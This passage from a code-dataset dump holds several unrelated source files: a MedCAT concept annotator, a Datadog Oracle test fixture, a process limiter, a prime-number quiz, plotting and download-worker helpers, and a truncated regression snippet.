int(round(time.time() * 1000))\n if args.image:\n filtered_ids = ImageId(filtered_ids)\n else:\n filtered_ids = AnnotationId(filtered_ids)\n c2 = data & filtered_ids\n end_time = int(round(time.time() * 1000))\n print(f'finish filter {end_time-begin_time} ms', flush=True)\n c2.save(args.outputfile)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"intersection_id.py","file_name":"intersection_id.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"240313051","text":"import os\nimport json\nimport pandas\nimport spacy\nfrom time import sleep\nfrom functools import partial\nfrom multiprocessing import Process, Manager, Queue, Pool, Array\nfrom medcat.cdb import CDB\nfrom medcat.spacy_cat import SpacyCat\nfrom medcat.preprocessing.tokenizers import spacy_split_all\nfrom medcat.utils.spelling import CustomSpellChecker\nfrom medcat.utils.spacy_pipe import SpacyPipe\nfrom medcat.preprocessing.cleaners import spacy_tag_punct\nfrom medcat.utils.helpers import get_all_from_name, tkn_inds_from_doc\nfrom medcat.utils.loggers import basic_logger\nimport 
sys, traceback\n\nlog = basic_logger(\"CAT\")\n\nclass CAT(object):\n \"\"\" Annotate a dataset\n \"\"\"\n SEPARATOR = \"\"\n NESTED_ENTITIES = os.getenv(\"NESTED_ENTITIES\", 'false').lower() == 'true'\n KEEP_PUNCT = os.getenv(\"KEEP_PUNCT\", \":|.\").split(\"|\")\n\n def __init__(self, cdb, vocab=None, skip_stopwords=True, meta_cats=[]):\n self.cdb = cdb\n self.vocab = vocab\n # Build the required spacy pipeline\n self.nlp = SpacyPipe(spacy_split_all)\n #self.nlp.add_punct_tagger(tagger=spacy_tag_punct)\n self.nlp.add_punct_tagger(tagger=partial(spacy_tag_punct,\n skip_stopwords=skip_stopwords,\n keep_punct=self.KEEP_PUNCT))\n\n # Add spell checker pipe\n self.spell_checker = CustomSpellChecker(cdb_vocab=self.cdb.vocab, data_vocab=self.vocab)\n self.nlp.add_spell_checker(spell_checker=self.spell_checker)\n\n # Add cat\n self.spacy_cat = SpacyCat(cdb=self.cdb, vocab=self.vocab)\n self.nlp.add_cat(spacy_cat=self.spacy_cat)\n\n self._meta_annotations = False\n for meta_cat in meta_cats:\n self.nlp.add_meta_cat(meta_cat, meta_cat.category_name)\n self._meta_annotations = True\n\n\n def __call__(self, text):\n return self.nlp(text)\n\n\n def add_concept_cntx(self, cui, text, tkn_inds, negative=False, lr=None, anneal=None, spacy_doc=None):\n if spacy_doc is None:\n spacy_doc = self(text)\n tkns = [spacy_doc[ind] for ind in range(tkn_inds[0], tkn_inds[-1] + 1)]\n self.spacy_cat._add_cntx_vec(cui=cui, doc=spacy_doc, tkns=tkns,\n negative=negative, lr=lr, anneal=anneal)\n\n\n def unlink_concept_name(self, cui, name, full_unlink=True):\n names = [name, name.lower()]\n # Unlink a concept from a name\n p_name, tokens, _, _ = get_all_from_name(name=name, source_value=name, nlp=self.nlp, version='clean')\n # Add the clean version of the name\n names.append(p_name)\n # Get the raw version\n p_name, tokens, _, _ = get_all_from_name(name=name, source_value=name, nlp=self.nlp, version='raw')\n # Append the raw evrsion\n names.append(p_name)\n\n if tokens[-1].lower() == \"s\":\n # Remove last 's' - a stupid bug\n names.append(p_name[0:-1])\n\n for name in names:\n cuis = [cui]\n if full_unlink and name in self.cdb.name2cui:\n cuis = list(self.cdb.name2cui[name])\n\n for cui in cuis:\n if cui in self.cdb.cui2names and name in self.cdb.cui2names[cui]:\n self.cdb.cui2names[cui].remove(name)\n if len(self.cdb.cui2names[cui]) == 0:\n del self.cdb.cui2names[cui]\n\n if name in self.cdb.name2cui:\n if cui in self.cdb.name2cui[name]:\n self.cdb.name2cui[name].remove(cui)\n\n if len(self.cdb.name2cui[name]) == 0:\n del self.cdb.name2cui[name]\n\n\n def _add_name(self, cui, source_val, is_pref_name, only_new=False, desc=None, tui=None):\n onto = 'def'\n all_cuis = []\n\n if cui in self.cdb.cui2ontos and self.cdb.cui2ontos[cui]:\n onto = list(self.cdb.cui2ontos[cui])[0]\n\n # Add the original version of the name just lowercased\n p_name, tokens, snames, tokens_vocab = get_all_from_name(name=source_val,\n source_value=source_val,\n nlp=self.nlp, version='none')\n if cui not in self.cdb.cui2names or p_name not in self.cdb.cui2names[cui]:\n if not only_new or p_name not in self.cdb.name2cui:\n self.cdb.add_concept(cui, p_name, onto, tokens, snames, tokens_vocab=tokens_vocab,\n original_name=source_val, is_pref_name=False, desc=desc, tui=tui)\n all_cuis.extend(self.cdb.name2cui[p_name])\n\n p_name, tokens, snames, tokens_vocab = get_all_from_name(name=source_val,\n source_value=source_val,\n nlp=self.nlp, version='clean')\n # This will add a new concept if the cui doesn't exist\n # or link the name to an existing concept 
if it exists.\n if cui not in self.cdb.cui2names or p_name not in self.cdb.cui2names[cui]:\n if not only_new or p_name not in self.cdb.name2cui:\n self.cdb.add_concept(cui, p_name, onto, tokens, snames, tokens_vocab=tokens_vocab,\n original_name=source_val, is_pref_name=False, desc=desc, tui=tui)\n all_cuis.extend(self.cdb.name2cui[p_name])\n\n # Add the raw also if needed\n p_name, tokens, snames, tokens_vocab = get_all_from_name(name=source_val,\n source_value=source_val,\n nlp=self.nlp, version='raw')\n if cui not in self.cdb.cui2names or p_name not in self.cdb.cui2names[cui] or is_pref_name:\n if not only_new or p_name not in self.cdb.name2cui:\n self.cdb.add_concept(cui, p_name, onto, tokens, snames, tokens_vocab=tokens_vocab,\n original_name=source_val, is_pref_name=is_pref_name, desc=desc, tui=tui)\n all_cuis.extend(self.cdb.name2cui[p_name])\n\n # Fix for ntkns in cdb\n if p_name in self.cdb.name2ntkns:\n if len(tokens) not in self.cdb.name2ntkns[p_name]:\n self.cdb.name2ntkns[p_name].add(len(tokens))\n\n return list(set(all_cuis))\n\n\n def add_name(self, cui, source_val, text=None, is_pref_name=False, tkn_inds=None, text_inds=None,\n spacy_doc=None, lr=None, anneal=None, negative=False, only_new=False, desc=None, tui=None,\n manually_created=False):\n \"\"\" Adds a new concept or appends the name to an existing concept\n if the cui already exists in the DB.\n\n cui: Concept uniqe ID\n source_val: Source value in the text\n text: the text of a document where source_val was found\n \"\"\"\n # First add the name, get bac all cuis that link to this name\n all_cuis = self._add_name(cui, source_val, is_pref_name, only_new=only_new, desc=desc, tui=tui)\n\n # Now add context if text is present\n if (text is not None and (source_val in text or text_inds)) or \\\n (spacy_doc is not None and (text_inds or tkn_inds)):\n if spacy_doc is None:\n spacy_doc = self(text)\n\n if tkn_inds is None:\n tkn_inds = tkn_inds_from_doc(spacy_doc=spacy_doc, text_inds=text_inds,\n source_val=source_val)\n\n if tkn_inds is not None and len(tkn_inds) > 0:\n self.add_concept_cntx(cui, text, tkn_inds, spacy_doc=spacy_doc, lr=lr, anneal=anneal,\n negative=negative)\n\n if manually_created:\n all_cuis.remove(cui)\n for _cui in all_cuis:\n self.add_concept_cntx(_cui, text, tkn_inds, spacy_doc=spacy_doc, lr=lr, anneal=anneal,\n negative=True)\n\n\n def _print_stats(self, data, epoch=0, use_filters=False, use_overlaps=False):\n tp = 0\n fp = 0\n fn = 0\n fps = {}\n fns = {}\n tps = {}\n cui_prec = {}\n cui_rec = {}\n cui_f1 = {}\n\n docs_with_problems = set()\n if self.spacy_cat.TUI_FILTER is None:\n _tui_filter = None\n else:\n _tui_filter = list(self.spacy_cat.TUI_FILTER)\n if self.spacy_cat.CUI_FILTER is None:\n _cui_filter = None\n else:\n _cui_filter = list(self.spacy_cat.CUI_FILTER)\n\n # Stupid\n for project in data['projects']:\n cui_filter = None\n tui_filter = None\n\n if use_filters:\n if 'cuis' in project and len(project['cuis'].strip()) > 0:\n cui_filter = [x.strip().upper() for x in project['cuis'].split(\",\")]\n if 'tuis' in project and len(project['tuis'].strip()) > 0:\n tui_filter = [x.strip().upper() for x in project['tuis'].split(\",\")]\n\n self.spacy_cat.TUI_FILTER = tui_filter\n self.spacy_cat.CUI_FILTER = cui_filter\n\n for doc in project['documents']:\n spacy_doc = self(doc['text'])\n anns = doc['annotations']\n if use_overlaps:\n p_anns = spacy_doc._.ents\n else:\n p_anns = spacy_doc.ents\n\n anns_norm = []\n for ann in anns:\n if ann.get('validated', True) and (not ann.get('killed', False) 
and not ann.get('deleted', False)):\n anns_norm.append((ann['start'], ann['cui']))\n p_anns_norm = []\n for ann in p_anns:\n p_anns_norm.append((ann.start_char, ann._.cui))\n\n for ann in p_anns_norm:\n if ann in anns_norm:\n tp += 1\n\n if ann[1] in tps:\n tps[ann[1]] += 1\n else:\n tps[ann[1]] = 1\n else:\n if ann[1] in fps:\n fps[ann[1]] += 1\n else:\n fps[ann[1]] = 1\n fp += 1\n docs_with_problems.add(doc['name'])\n\n for ann in anns_norm:\n if ann not in p_anns_norm:\n fn += 1\n docs_with_problems.add(doc['name'])\n\n if ann[1] in fns:\n fns[ann[1]] += 1\n else:\n fns[ann[1]] = 1\n try:\n prec = tp / (tp + fp)\n rec = tp / (tp + fn)\n f1 = 2 * prec * rec / (prec + rec)\n print(\"Epoch: {}, Prec: {}, Rec: {}, F1: {}\".format(epoch, prec, rec, f1))\n print(\"First 10 out of {} docs with problems: {}\".format(len(docs_with_problems),\n \"; \".join([str(x) for x in list(docs_with_problems)[0:10]])))\n\n # Sort fns & prec\n fps = {k: v for k, v in sorted(fps.items(), key=lambda item: item[1], reverse=True)}\n fns = {k: v for k, v in sorted(fns.items(), key=lambda item: item[1], reverse=True)}\n tps = {k: v for k, v in sorted(tps.items(), key=lambda item: item[1], reverse=True)}\n\n\n # F1 per concept\n for cui in tps.keys():\n prec = tps[cui] / (tps.get(cui, 0) + fps.get(cui, 0))\n rec = tps[cui] / (tps.get(cui, 0) + fns.get(cui, 0))\n f1 = 2 * prec * rec / (prec + rec)\n cui_prec[cui] = prec\n cui_rec[cui] = rec\n cui_f1[cui] = f1\n\n\n # Get top 10\n pr_fps = [(self.cdb.cui2pretty_name.get(cui,\n list(self.cdb.cui2original_names.get(cui, [\"UNK\"]))[0]), cui, fps[cui]) for cui in list(fps.keys())[0:10]]\n pr_fns = [(self.cdb.cui2pretty_name.get(cui,\n list(self.cdb.cui2original_names.get(cui, [\"UNK\"]))[0]), cui, fns[cui]) for cui in list(fns.keys())[0:10]]\n pr_tps = [(self.cdb.cui2pretty_name.get(cui,\n list(self.cdb.cui2original_names.get(cui, [\"UNK\"]))[0]), cui, tps[cui]) for cui in list(tps.keys())[0:10]]\n\n\n print(\"\\n\\nFalse Positives\\n\")\n for one in pr_fps:\n print(\"{:70} - {:20} - {:10}\".format(one[0], one[1], one[2]))\n print(\"\\n\\nFalse Negatives\\n\")\n for one in pr_fns:\n print(\"{:70} - {:20} - {:10}\".format(one[0], one[1], one[2]))\n print(\"\\n\\nTrue Positives\\n\")\n for one in pr_tps:\n print(\"{:70} - {:20} - {:10}\".format(one[0], one[1], one[2]))\n print(\"*\"*110 + \"\\n\")\n\n\n except Exception as e:\n traceback.print_exc()\n\n self.spacy_cat.TUI_FILTER = _tui_filter\n self.spacy_cat.CUI_FILTER = _cui_filter\n\n return fps, fns, tps, cui_prec, cui_rec, cui_f1\n\n\n def train_supervised(self, data_path, reset_cdb=False, reset_cui_count=False, nepochs=30, lr=None,\n anneal=None, print_stats=False, test_set=None, use_filters=False):\n \"\"\" Given data learns vector embeddings for concepts\n in a supervised way.\n\n data_path: path to data in json format\n \"\"\"\n self.train = False\n data = json.load(open(data_path))\n\n if print_stats:\n if test_set:\n self._print_stats(test_set, use_filters=use_filters)\n else:\n self._print_stats(data, use_filters=use_filters)\n\n if reset_cdb:\n self.cdb = CDB()\n self.spacy_cat.cdb = self.cdb\n self.spacy_cat.cat_ann.cdb = self.cdb\n\n if reset_cui_count:\n # Get all CUIs\n cuis = []\n for project in data['projects']:\n for doc in project['documents']:\n for ann in doc['annotations']:\n cuis.append(ann['cui'])\n for cui in set(cuis):\n if cui in self.cdb.cui_count:\n self.cdb.cui_count[cui] = 10\n\n # Remove entities that were terminated\n for project in data['projects']:\n for doc in project['documents']:\n for ann in 
doc['annotations']:\n if ann.get('killed', False):\n self.unlink_concept_name(ann['cui'], ann['value'])\n\n for epoch in range(nepochs):\n print(\"Starting epoch: {}\".format(epoch))\n log.info(\"Starting epoch: {}\".format(epoch))\n # Print acc before training\n\n for project in data['projects']:\n for i_doc, doc in enumerate(project['documents']):\n spacy_doc = self(doc['text'])\n for ann in doc['annotations']:\n if not ann.get('killed', False):\n cui = ann['cui']\n start = ann['start']\n end = ann['end']\n deleted = ann.get('deleted', False)\n manually_created = ann.get('manually_created', False)\n self.add_name(cui=cui,\n source_val=ann['value'],\n spacy_doc=spacy_doc,\n text_inds=[start, end],\n negative=deleted,\n lr=lr,\n anneal=anneal,\n manually_created=manually_created)\n if epoch % 5 == 0:\n if print_stats:\n if test_set:\n self._print_stats(test_set, epoch=epoch+1, use_filters=use_filters)\n else:\n self._print_stats(data, epoch=epoch+1, use_filters=use_filters)\n\n\n\n @property\n def train(self):\n return self.spacy_cat.train\n\n\n @train.setter\n def train(self, val):\n self.spacy_cat.train = val\n\n\n def run_training(self, data_iterator, fine_tune=False):\n \"\"\" Runs training on the data\n\n data_iterator: Simple iterator over sentences/documents, e.g. a open file\n or an array or anything else that we can use in a for loop.\n fine_tune: If False old training will be removed\n \"\"\"\n self.train = True\n cnt = 0\n\n if not fine_tune:\n print(\"Removing old training data!\\n\")\n self.cdb.reset_training()\n self.cdb.coo_dict = {}\n self.spacy_cat._train_skip_names = {}\n\n for line in data_iterator:\n if line is not None:\n try:\n _ = self(line)\n except Exception as e:\n print(\"LINE: '{}' \\t WAS SKIPPED\".format(line))\n print(\"BECAUSE OF: \" + str(e))\n if cnt % 1000 == 0:\n print(\"DONE: \" + str(cnt))\n cnt += 1\n self.train = False\n\n\n def get_entities(self, text, cat_filter=None, only_cui=False):\n \"\"\" Get entities\n\n text: text to be annotated\n return: entities\n \"\"\"\n doc = self(text)\n out = []\n\n if cat_filter:\n cat_filter(doc, self)\n\n out_ent = {}\n if self.NESTED_ENTITIES:\n _ents = doc._.ents\n else:\n _ents = doc.ents\n\n for ind, ent in enumerate(_ents):\n cui = str(ent._.cui)\n if not only_cui:\n out_ent['cui'] = cui\n out_ent['tui'] = str(ent._.tui)\n out_ent['type'] = str(self.cdb.tui2name.get(out_ent['tui'], ''))\n out_ent['source_value'] = str(ent.text)\n out_ent['acc'] = str(ent._.acc)\n out_ent['start'] = ent.start_char\n out_ent['end'] = ent.end_char\n out_ent['id'] = str(ent._.id)\n out_ent['pretty_name'] = self.cdb.cui2pretty_name.get(cui, '')\n\n if cui in self.cdb.cui2info and 'icd10' in self.cdb.cui2info[cui]:\n icds = []\n for icd10 in self.cdb.cui2info[cui]['icd10']:\n icds.append(str(icd10['chapter']))\n out_ent['icd10'] = \",\".join(icds)\n else:\n out_ent['icd10'] = \"\"\n\n if cui in self.cdb.cui2info and 'umls' in self.cdb.cui2info[cui]:\n umls = [str(u) for u in self.cdb.cui2info[cui]['umls']]\n out_ent['umls'] = \",\".join(umls)\n else:\n out_ent['umls'] = ''\n\n if cui in self.cdb.cui2info and 'snomed' in self.cdb.cui2info[cui]:\n snomed = [str(u) for u in self.cdb.cui2info[cui]['snomed']]\n out_ent['snomed'] = \",\".join(snomed)\n else:\n out_ent['snomed'] = ''\n\n if hasattr(ent._, 'meta_anns') and ent._.meta_anns:\n out_ent['meta_anns'] = []\n for key in ent._.meta_anns.keys():\n one = {'name': key, 'value': ent._.meta_anns[key]}\n out_ent['meta_anns'].append(one) \n\n out.append(dict(out_ent))\n else:\n 
out.append(cui)\n\n return out\n\n\n def get_json(self, text, cat_filter=None, only_cui=False):\n \"\"\" Get output in json format\n\n text: text to be annotated\n return: json with fields {'entities': <>, 'text': text}\n \"\"\"\n ents = self.get_entities(text, cat_filter, only_cui)\n out = {'entities': ents, 'text': text}\n\n return json.dumps(out)\n\n\n def multi_processing(self, in_data, nproc=8, batch_size=100, cat_filter=None, only_cui=False):\n \"\"\" Run multiprocessing NOT FOR TRAINING\n in_data: an iterator or array with format: [(id, text), (id, text), ...]\n nproc: number of processors\n batch_size: obvious\n\n return: an list of tuples: [(id, doc_json), (id, doc_json), ...]\n \"\"\"\n\n if self._meta_annotations:\n # Hack for torch using multithreading, which is not good here\n import torch\n torch.set_num_threads(1)\n\n # Create the input output for MP\n in_q = Queue(maxsize=4*nproc)\n manager = Manager()\n out_dict = manager.dict()\n out_dict['processed'] = []\n\n # Create processes\n procs = []\n for i in range(nproc):\n p = Process(target=self._mp_cons, args=(in_q, out_dict, i, cat_filter, only_cui))\n p.start()\n procs.append(p)\n\n data = []\n for id, text in in_data:\n data.append((id, text))\n if len(data) == batch_size:\n in_q.put(data)\n data = []\n # Put the last batch if it exists\n if len(data) > 0:\n in_q.put(data)\n\n for _ in range(nproc): # tell workers we're done\n in_q.put(None)\n\n for p in procs:\n p.join()\n\n # Close the queue as it can cause memory leaks\n in_q.close()\n\n out = []\n for key in out_dict.keys():\n if 'pid' in key:\n data = out_dict[key]\n out.extend(data)\n\n # Sometimes necessary to free memory\n out_dict.clear()\n del out_dict\n\n return out\n\n\n def _mp_cons(self, in_q, out_dict, pid=0, cat_filter=None, only_cui=False):\n cnt = 0\n out = []\n while True:\n if not in_q.empty():\n data = in_q.get()\n if data is None:\n out_dict['pid: {}'.format(pid)] = out\n break\n\n for id, text in data:\n try:\n doc = json.loads(self.get_json(text, cat_filter, only_cui))\n out.append((id, doc))\n except Exception as e:\n print(\"Exception in _mp_cons\")\n print(e)\n\n sleep(1)\n","sub_path":"medcat/cat.py","file_name":"cat.py","file_ext":"py","file_size_in_byte":22014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"269309849","text":"# (C) Datadog, Inc. 
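# A standalone miniature of the Queue + sentinel pattern used by
# multi_processing()/_mp_cons() above: batches go onto a queue, every worker
# drains it until it sees None, and results land in a Manager dict keyed by
# pid. The upper-casing "annotator" is a stand-in for the real per-text work.
# Note the blocking get(): it avoids the empty()/sleep() polling race.
from multiprocessing import Manager, Process, Queue

def worker(in_q, out_dict, pid):
    out = []
    while True:
        batch = in_q.get()              # blocks until a batch or sentinel arrives
        if batch is None:
            out_dict['pid: {}'.format(pid)] = out
            break
        out.extend((i, text.upper()) for i, text in batch)

if __name__ == '__main__':
    in_q = Queue()
    manager = Manager()                 # keep a reference so the server stays alive
    out_dict = manager.dict()
    procs = [Process(target=worker, args=(in_q, out_dict, i)) for i in range(2)]
    for p in procs:
        p.start()
    in_q.put([(0, 'one'), (1, 'two')])
    in_q.put([(2, 'three')])
    for _ in procs:
        in_q.put(None)                  # one sentinel per worker
    for p in procs:
        p.join()
    print(sorted(pair for chunk in out_dict.values() for pair in chunk))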
2018\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\nimport os\n\nimport pytest\n\nfrom datadog_checks.dev.ssh_tunnel import tcp_tunnel\nfrom datadog_checks.dev.terraform import terraform_run\nfrom datadog_checks.dev.utils import get_here\nfrom datadog_checks.oracle import Oracle\n\nHERE = os.path.dirname(os.path.abspath(__file__))\nCHECK_NAME = \"oracle\"\n\n\n@pytest.fixture\ndef check():\n return Oracle(CHECK_NAME, {}, {})\n\n\n@pytest.fixture\ndef instance():\n return {\n 'server': 'localhost:1521',\n 'user': 'system',\n 'password': 'oracle',\n 'service_name': 'xe',\n 'tags': ['optional:tag1'],\n }\n\n\n@pytest.fixture(scope='session')\ndef dd_environment():\n with terraform_run(os.path.join(get_here(), 'terraform')) as outputs:\n ip = outputs['ip']['value']\n private_key = outputs['ssh_private_key']['value']\n with tcp_tunnel(ip, 'oracle', private_key, 1521) as tunnel:\n ip, port = tunnel\n env_instance = {\n 'server': '{}:{}'.format(ip, port),\n 'user': 'datadog',\n 'password': 'Oracle123',\n 'service_name': 'orcl.c.datadog-integrations-lab.internal',\n }\n yield env_instance, E2E_METADATA\n\n\nE2E_METADATA = {\n 'start_commands': [\n 'mkdir /opt/oracle',\n 'apt-get update',\n 'apt-get install libaio1 unzip',\n 'curl -o /opt/oracle/instantclient.zip '\n 'https://storage.googleapis.com/datadog-integrations-lab/instantclient-basiclite-linux.x64-19.3.0.0.0dbru.zip',\n 'unzip /opt/oracle/instantclient.zip -d /opt/oracle',\n ],\n 'env_vars': {'LD_LIBRARY_PATH': '/opt/oracle/instantclient_19_3'},\n}\n","sub_path":"oracle/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"320477719","text":"import psutil\nimport os\nimport time\n\nuser = \"set\"\ncnt = 0\ndef chxpids(user):\n\tcnt = 0\n\tfor proc in psutil.process_iter():\n\t\tp = proc.as_dict(attrs=['pid', 'username'])\n\t\tif p['username'] == user:\n\t\t\tcnt=cnt + 1\n\t\tif cnt >= 5:\n\t\t\tos.kill(p['pid'], 9)\n\nwhile 1:\n\tchxpids(user)\n\ttime.sleep(1)\n","sub_path":"python/process-choke.py","file_name":"process-choke.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"523451824","text":"# Matplotlib\nfrom matplotlib import pyplot as plt\n\ndef plot_features(validation_examples,validation_targets,training_examples,training_targets) :\n plt.figure(figsize=(13, 8))\n\n ax = plt.subplot(1, 2, 1)\n ax.set_title(\"Validation Data\")\n\n ax.set_autoscaley_on(False)\n ax.set_ylim([32, 43]) # limit y\n ax.set_autoscalex_on(False)\n ax.set_xlim([-126, -112]) # limit x\n plt.scatter(validation_examples[\"origin.x\"],\n validation_examples[\"origin.y\"],\n cmap=\"coolwarm\",\n c=validation_targets[\"hit\"])\n\n ax = plt.subplot(1,2,2)\n ax.set_title(\"Training Data\")\n\n ax.set_autoscaley_on(False) \n ax.set_ylim([32, 43]) # limit y\n ax.set_autoscalex_on(False)\n ax.set_xlim([-126, -112]) # limit x\n plt.scatter(training_examples[\"origin.x\"],\n training_examples[\"origin.y\"],\n cmap=\"coolwarm\",\n c=training_targets[\"hit\"])\n _ = plt.plot()\n plt.show()","sub_path":"tensorflow/models/LinearClassifier/dataPlotter.py","file_name":"dataPlotter.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"478579100","text":"import os\nfrom PySide.QtCore import Signal, QObject, 
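# A gentler variant of the per-user process cap in process-choke.py above,
# sketched with illustrative names and not the original script's behaviour:
# count the user's processes first, then signal only the ones past the limit,
# preferring SIGTERM to an unconditional kill -9.
import signal
import psutil

def pids_over_limit(user, limit=5):
    pids = [p.info['pid'] for p in psutil.process_iter(attrs=['pid', 'username'])
            if p.info['username'] == user]
    return pids[limit:]                 # whatever exceeds the allowance

def choke(user, limit=5):
    for pid in pids_over_limit(user, limit):
        try:
            psutil.Process(pid).send_signal(signal.SIGTERM)
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            pass                        # raced with exit, or not ours to signal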
QTimer\nfrom ..downloads.series import DownloadSeries\nfrom ..downloads.subtitles import DownloadSubtitle\nfrom ..models import SeriesEntry\nfrom ..utils import ticked\nfrom .. import const\nfrom .base import BaseWorkerThread\n\n\nclass DownloadsWorker(QObject):\n \"\"\"Series list worker\"\"\"\n need_download = Signal(SeriesEntry, int)\n downloaded = Signal(SeriesEntry, int)\n download_progress = Signal(SeriesEntry, float)\n\n def __init__(self, *args, **kwargs):\n super(DownloadsWorker, self).__init__(*args, **kwargs)\n self.subtitles = DownloadSubtitle()\n self.series = DownloadSeries()\n self.need_download.connect(self._download)\n\n def _update_pause_state(self, entry, handler):\n \"\"\"Update pause state\"\"\"\n if entry.pause_state == const.NEED_PAUSE:\n handler.pause()\n entry.pause_state = const.NORMAL\n elif entry.pause_state == const.NEED_RESUME:\n handler.resume()\n entry.pause_state = const.NORMAL\n\n @ticked\n def _download(self, entry, tick):\n \"\"\"Get series\"\"\"\n handler = self.series.download(entry)\n entry.subtitle.series = entry\n if entry.subtitle.wait_for_file:\n entry.subtitle.downloaded = False\n else:\n self.subtitles.download(entry.subtitle)\n\n def _check_download():\n if (\n entry.subtitle.wait_for_file and\n not entry.subtitle.downloaded\n and os.path.exists(entry.path)\n ):\n self.subtitles.download(entry.subtitle)\n if entry.stop_download:\n handler.remove()\n entry.remove_file()\n self._update_pause_state(entry, handler)\n if handler.finished or entry.stop_download:\n self.downloaded.emit(entry, tick)\n else:\n QTimer.singleShot(100, _check_download)\n self.download_progress.emit(entry, handler.percent)\n _check_download()\n\n\nclass DownloadsWorkerThread(BaseWorkerThread):\n \"\"\"Downloads worker\"\"\"\n worker = DownloadsWorker\n","sub_path":"series_list/workers/downloads.py","file_name":"downloads.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"132248643","text":"# DO *NOT* WRITE YOUR NAME TO MAINTAIN ANONYMITY FOR PLAGIARISM DETECTION\n\n\nfrom math import sqrt\nfrom itertools import permutations\n\n\ndef is_prime(n):\n if n <= 1:\n return False\n if n <= 3:\n return True\n if n % 2 == 0:\n return False\n # Only used to test odd numbers.\n return all(n % d for d in range(3, round(n ** 0.5) + 1, 2))\n\n\ndef first_sieve_of_primes_up_to(n):\n sieve = list(range(2, n + 1))\n i = 0\n while sieve[i] <= round(sqrt(n)):\n k = 0\n while True:\n factor = sieve[i] * sieve[i + k]\n if factor > n:\n break\n while factor <= n:\n sieve.remove(factor)\n factor *= sieve[i]\n k += 1\n i += 1\n return sieve\n\n\ndef second_sieve_of_primes_up_to(n):\n sieve = list(range(2, n + 1))\n i = 0\n while sieve[i] <= round(sqrt(n)):\n sieve_as_set = set(sieve)\n k = 0\n while True:\n factor = sieve[i] * sieve[i + k]\n if factor > n:\n break\n sieve_as_set.remove(factor)\n k += 1\n sieve = sorted(sieve_as_set)\n i += 1\n return sieve\n\n\n# 没有0,数字不重复,素数\n# A number is a good prime if it is prime and consists of nothing but\n# distinct nonzero digits.\n# Returns True or False depending on whether the integer provided as\n# argument is or is not a good prime, respectively.\n# Will be tested with for number a positive integer at most equal to\n# 10_000_000.\ndef is_good_prime(number):\n # REPLACE PASS ABOVE WITH YOUR CODE\n # if str(number).count('0') > 0 or len(set(str(number))) != len(str(number)):\n # 没有0,数字不重复,素数\n return False if '0' in str(number) or len(set(str(number))) != 
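# The two sieves above delete composites with list.remove(), which costs O(n)
# per call. The usual boolean-array Sieve of Eratosthenes does the same job in
# near-linear time; a standalone sketch, handy for cross-checking is_prime().
def sieve_of_primes_up_to(n):
    is_composite = [False] * (n + 1)
    primes = []
    for k in range(2, n + 1):
        if not is_composite[k]:
            primes.append(k)
            for m in range(k * k, n + 1, k):
                is_composite[m] = True
    return primes

assert sieve_of_primes_up_to(30) == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]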
len(str(number)) else is_prime(number)\n\n\n# pattern is expected to be a nonempty string consisting of underscores\n# and digits of length at most 7.\n# Underscores have to be replaced by digits so that the resulting number\n# is the smallest good prime, in case it exists.\n# The function returns that number if it exists, None otherwise.\ndef smallest_good_prime(pattern):\n # REPLACE PASS ABOVE WITH YOUR CODE\n # 没有0,数字不重复,最小的good素数\n result = None\n if '0' in pattern:\n return result\n # check完整的数字\n if '_' not in pattern:\n if is_good_prime(int(pattern)):\n result = int(pattern)\n return result\n\n # check重复的数字\n # 是否存在重复的数据\n #\n if [1 for item in pattern if item != '_' and pattern.count(item) > 1]:\n return None\n\n all_digits = list('123456789')\n pattern_digits = set(pattern.replace('_', ''))\n\n # _12_ 3456789\n # 3124\n # 4123\n pattern_left_digits = list(sorted(set(all_digits) - pattern_digits))\n # 2\n underscore_count = pattern.count(\"_\")\n permutations_result = permutations(pattern_left_digits, underscore_count)\n for items in permutations_result:\n number = get_number_by_items(pattern, items)\n if is_good_prime(number):\n print(pattern, number)\n return number\n return None\n\n\n# POSSIBLY DEFINE OTHER FUNCTIONS\ndef get_number_by_items(pattern, items):\n pattern_list = list(pattern)\n index = 0\n for underscore_index in range(len(pattern_list)):\n if pattern_list[underscore_index] == '_':\n pattern_list[underscore_index] = items[index]\n index += 1\n # 执行完for循环之后\n # pattern_list = ['3','1','2','4']\n number = int(\"\".join(pattern_list))\n return number\n\n\nif __name__ == \"__main__\":\n smallest_good_prime('_0_')\n smallest_good_prime('2_2')\n smallest_good_prime('123')\n smallest_good_prime('_98')\n smallest_good_prime('3167')\n smallest_good_prime('__')\n smallest_good_prime('___')\n smallest_good_prime('1_7')\n smallest_good_prime('_89')\n smallest_good_prime('_89_')\n smallest_good_prime('_2_4_')\n smallest_good_prime('1__4_7')\n","sub_path":"Quiz/04/quiz_4.py","file_name":"quiz_4.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"445972143","text":"from pug.crawler.models import WikiItem as Item\r\nimport numpy as np\r\n\r\n# a [10000 x num_predictors] matrix inversion is intractible, so don't dare try it\r\nMAX_NUM_RECORDS = 10000\r\n\r\n\r\ndef predictor_values(predictors=None, filter_dict=None, exclude_dict=None, predicted='wikiitem.modified', max_num_records=10000):\r\n from collections import OrderedDict as OD\r\n if predictors is None:\r\n # values in the database retrieved for assignment to values in an array of data for the fit\r\n predictors = (\r\n # Name, Django ORM queryset record python expression\r\n ('modified', 'title'),\r\n ('crawled', 'modified'),\r\n )\r\n predictors = OD(predictors)\r\n # if filter_dict is None:\r\n # # subset of the data to perform the multivariate linear regression on\r\n # filter_dict = (('serial_number__isnot', 'TRUNCATED'),)\r\n # filter_dict = OD(filter_dict)\r\n\r\n qs = 